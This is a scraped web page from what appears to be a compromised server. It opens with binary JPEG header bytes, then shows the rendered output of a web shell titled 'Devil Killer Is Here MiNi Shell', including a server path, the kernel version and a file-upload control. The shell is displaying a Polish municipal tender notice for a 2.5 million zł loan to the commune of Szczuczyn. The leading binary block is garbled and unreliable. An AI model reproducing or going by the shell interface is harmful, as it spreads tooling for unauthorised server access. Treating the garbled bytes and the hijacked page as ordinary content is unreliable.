JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230822/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230822/0036286401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Udzielenie kredytu długotermin. wys. 2500000,00zł z tego spłatę zobowiązań z tyt. wcześniej zaciągniętych kredytów i poż. w kwocie 1884360,00, finansowanie planowanego deficytu budż. w kw. 615640,00 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Szczuczyn</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 450669766</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac 1000 lecia 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczuczyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">19-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@szczuczyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">um.szczuczyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Udzielenie kredytu długotermin. wys. 2500000,00zł z tego spłatę zobowiązań z tyt. wcześniej zaciągniętych kredytów i poż. w kwocie 1884360,00, finansowanie planowanego deficytu budż. w kw. 615640,00 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-684bffea-40ea-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00362864</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/um_szczuczyn <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/um_szczuczyn</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Preferuje się, aby komunikacja między<br/>Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski zawiadomienia informacje przekazywane były za<br/>pośrednictwem platformazakupowa.pl i formularza Wyślij wiadomość do zamawiającego. Za datę przekazania oświadczeń,<br/>wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie<br/>przycisku Wyślij wiadomość do zamawiającego po których pojawi się komunikat, że wiadomość została<br/>wysłana. Zamawiający będzie przekazywał informacje przy użyciu środków komunikacji elektronicznej za pośrednictwem<br/>platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, modyfikacje treści SWZ, zmiany terminu składania i otwarcia<br/>ofert Zamawiający będzie zamieszczał na Platformie w sekcji Komunikaty. Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia PRM<br/>z dnia 30 grudnia 2020r. zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i<br/>oznaczania czasu przekazania i odbioru danych za pośrednictwemplatformazakupowa.pl, tj.: a)stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s, b)komputer klasy PC lub MAC o konfiguracji: pamięć min. 2 GB Ram,<br/>procesor<br/>Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze<br/>wersje, c)zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0., d)włączona<br/>obsługa JavaScript, e)zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f)platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8, g)oznaczenie czasu odbioru<br/>danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego<br/>z zegarem Głównego Urzędu Miar. Wykonawca, przystępując do postępowania: a) akceptuje warunki korzystania z<br/>platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej w zakładce „Regulamin&#34; oraz uznaje go za<br/>wiążący; b)<br/>zapoznaje się i stosuje się do Instrukcji składania ofert/wniosków dostępnej na platformazakupowa.pl. Zamawiający informuje, że<br/>instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ,<br/>składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w<br/>zakładce Instrukcje dla Wykonawców na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>Zalecenia Zamawiającego: 1) Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do<br/>“Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i<br/>wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych zwanego dalej<br/>Rozporządzeniem KRI. 2)Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym<br/>wskazaniem na .pdf, 3)W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń: .zip,<br/>.7Z 4)Wśród rozszerzeń powszechnych a niewystępujących w „Rozporządzeniu KRI” występują: .rar .gif .bmp .numbers .pages.<br/>Dokumenty złożone w takich plikach zostaną uznane za złożone<br/>nieskutecznie. 5) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi<br/>maksymalnie 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu<br/>osobistego, który wynosi maksymalnie 5MB. 6)W przypadku stosowania przez Wykonawcę kwalifikowanego podpisu<br/>elektronicznego ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że: 1)admin. Pani/a danych osobowych jest Gmina Szczuczyn, Plac<br/>1000-lecia 23, 19-230 Szczuczyn, telefon: 86 273 50 80; 2)administrator wyznaczył Inspektora Danych Osobowych, z którym można<br/>się kontaktować pod adresem e-mail: iod@um.szczuczyn.pl<br/>3)Pani/a dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego pn.: Udzielenie kredytu długoterminowego w wysokości 2500 000,00 zł z tego<br/>na spłatę zobowiązań z tytułu wcześniej zaciągniętych kredytów i pożyczek w kwocie 1884360,00 zł oraz finansowanie planowanego<br/>deficytu budżetu w kwocie 615640,00 zł, znak sprawy FN.271.12.2023, prowadzonym w trybie podstawowym<br/>4)odbiorcami Pani/a danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy Pzp; 5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy; 6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio<br/>Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; 7)w odniesieniu do Pani/a danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO; 8)posiada Pani/n:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/a dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/n zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b)na podstawie art. 16 RODO prawo do sprostowania Pani/a danych osobowych (skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);c)na podstawie art. 18 RODO<br/>prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej<br/>lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub<br/>państwa członkowskiego);d)prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/n, że<br/>przetwarzanie danych osobowych Pani/a dotyczących narusza przepisy RODO; 9) nie przysługuje Pani/u: a)w związku z art. 17 ust.<br/>3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;b) prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO;c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; 10)przysługuje Pani/u prawo wniesienia skargi do organu<br/>nadzorczego na niezgodne z RODO przetwarzanie Pani/a danych osobowych przez administr. Organem właściwym dla przedmiotowej skargi jest UODO, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FN.271.12.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia publicznego jest udzielenie kredytu długoterminowego w wysokości 2 500 000,00 zł z tego na spłatę zobowiązań z tytułu wcześniej zaciągniętych kredytów i pożyczek w kwocie 1 884 360,00 zł oraz finansowanie planowanego deficytu budżetu w kwocie 615 640,00 zł.<br/>2.	Wymagania związane z realizacją przedmiotu zamówienia:<br/>a)	przeznaczenie kredytu: sfinansowanie deficytu – 615 640,00 zł, spłata wcześniej zaciągniętych kredytów – 1 884 360,00 zł,<br/>b)	kwota i waluta kredytu: 2 500 000,00 PLN,<br/>c)	okres kredytowania: 124 miesiące, (120 m- cy spłaty + 4 m- cy karencja),<br/>d)	okres karencji w spłacie kapitału: spłata od stycznia 2024r.,<br/>e)	terminy spłaty kapitału: miesięcznie, raty zmienne zgodnie z harmonogramem (spłata do końca każdego miesiąca),<br/>f)	oprocentowanie kredytu: średni WIBOR 1 M (wielkość ustalona w oparciu o średnią) stawek WIBOR 1M obowiązujący w okresie od pierwszego do ostatniego dnia miesiąca poprzedzającego dany okres odsetkowy,<br/>g)	sposób ustalenia wysokości stopy procentowej: Stopa procentowa dla danego okresu odsetkowego jest ustalona na podstawie zmiennej stopy procentowej równej średniej miesięcznej stawce WIBOR 1M z poprzedniego miesiąca powiększonej o marże banku, która jest stała w całym okresie kredytowania,<br/>h)	termin spłaty odsetek: miesięcznie,<br/>i)	okres karencji w spłacie odsetek: brak karencji,<br/>j)	sposób zabezpieczenia kredytu: weksel in blanco wraz z deklaracją wekslową przy kontrasygnacie Skarbnika Gminy i oświadczenie o poddaniu się egzekucji,<br/>k)	pożądany termin zawarcia umowy: 14 września 2023r.,<br/>l)	wysokość prowizji za gotowość od kwoty niewykorzystanego kredytu: 0%,<br/>m)	wysokość prowizji rekompensacyjnej od kwoty spłaconej przed terminem: 0%,<br/>n)	Spłata kredytu wraz z odsetkami nastąpi wg Harmonogramu spłaty kredytu stanowiącego załącznik do specyfikacji,<br/>o)	odsetki od kredytu naliczone będą tylko od kwoty aktualnego, rzeczywistego zadłużenia,<br/>p)	data wykorzystania kredytu: do 30.12.2023r.,<br/>q)	Zamawiający nie dopuszcza ponoszenia kosztów związanych z zabezpieczeniem kredytu (np. oświadczenie o poddaniu się egzekucji, zgodnie z art. 777 k.p.c. w formie aktu notarialnego)<br/>r)	za dzień uruchomienia kredytu do skalkulowania ceny oferty należy przyjąć dzień 01.09.2023r.<br/>s)	Zamawiający nie realizuje postępowania naprawczego ani nie ma zamiaru przystąpić do jego realizacji.<br/>t)	Kredyt będzie udostępniony dla Zamawiającego na podstawie pisemnych dyspozycji e-mail w ciągu maksymalnie 3 dni od chwili zapotrzebowania przez Zamawiającego określonej kwoty.<br/>3.	Zamawiający zastrzega sobie:<br/>	możliwość nie wykorzystania pełnej kwoty kredytu bez ponoszenia dodatkowych opłat warunkując powyższe otrzymaniem środków z innych źródeł,<br/>	wcześniejszą spłatę kredytu bez podnoszenia dodatkowych opłat,<br/>	wydłużenia okresu spłaty kredytu po uprzednim złożeniu stosownego wniosku do banku, pod warunkiem posiadania zdolności do spłaty kredytu w okresie wydłużonego kredytowania,<br/>	dokonania przesunięcia terminu spłaty poszczególnych rat kredytowych w całym okresie objętym umową, po uprzednim zawiadomieniu banku o takim zamiarze, bez konieczności ponoszenia dodatkowych kosztów wynikających ze zmiany harmonogramu spłaty kredytu,<br/>	wykonawca zobowiązany jest dołączyć projekt umowy. Umowa może być sporządzona na druku banku oferenta z zastrzeżeniem, że winna zawierać istotne postanowienia wskazane w specyfikacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66113000-5 - Usługi udzielania kredytu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin uruchomienia transzy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale 6 SWZ oraz spełniają warunki udziału w postępowaniu określone przez Zamawiającego w ogłoszeniu o<br/>zamówieniu i niniejszej SWZ.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Warunek, uważa się za spełniony, gdy Wykonawca wykaże, że posiada zezwolenie Komisji Nadzoru Finansowego na<br/>rozpoczęcie działalności bankowej, o którym mowa w art. 36 ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (tj. Dz.U. z<br/>2020 r., poz. 1896 ze zm.) lub inny dokument, na podstawie którego prowadzona jest działalność bankowa w zakresie<br/>przedmiotu niniejszego zamówienia, zgodnie z przepisami Prawa bankowego.<br/>UWAGA! W przypadku złożenia oferty przez grupę Wykonawców (Konsorcjum), Zamawiający uzna powyższy warunek<br/>udziału w postępowaniu za spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do<br/>których<br/>realizacji te uprawnienia są wymagane. W przypadku banków zagranicznych w rozumieniu ustawy Prawo bankowe, w<br/>miejsce w/w dokumentów należy przedstawić odpowiedni dokument z kraju siedziby banku, potwierdzający<br/>prawo do prowadzenia działalności bankowej oraz zezwolenie Komisji Nadzoru Finansowego na prowadzenie działalności<br/>na terytorium Rzeczpospolitej Polskiej w formie oddziału. W przypadku instytucji kredytowych w rozumieniu ustawy Prawo bankowe w miejsce w/w dokumentów należy przedstawić odpowiedni dokument z kraju siedziby banku, potwierdzający<br/>prawo do prowadzenia działalności bankowej oraz dowód otrzymania przez Komisję Nadzoru Finansowego od<br/>właściwych władz nadzorczych państwa macierzystego stosownego zawiadomienia/informacji.<br/>3) sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej: Zamawiający nie stawia warunku w powyższym zakresie.<br/>3. Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca<br/>zobowiązany jest dołączyć oświadczenie o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu<br/>(oświadczenie, o którym mowa w art. 125 ust. 1 ustawy<br/>Pzp), w zakresie wskazanym przez Zamawiającego, którego wzór stanowi Załącznik nr 3 do SWZ.<br/>2. Oświadczenie, o którym mowa w ust. 1 powyżej stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe<br/>środki dowodowe, wskazane w niniejszym Rozdziale SWZ.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa w ust. 1 niniejszego<br/>Rozdziału SWZ, składa każdy z Wykonawców. Oświadczenie to ma potwierdzać brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu, w zakresie,<br/>w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. Zamawiający wymaga od Wykonawcy złożenia w oświadczeniu, o którym mowa w ust. 1 niniejszego Rozdziału 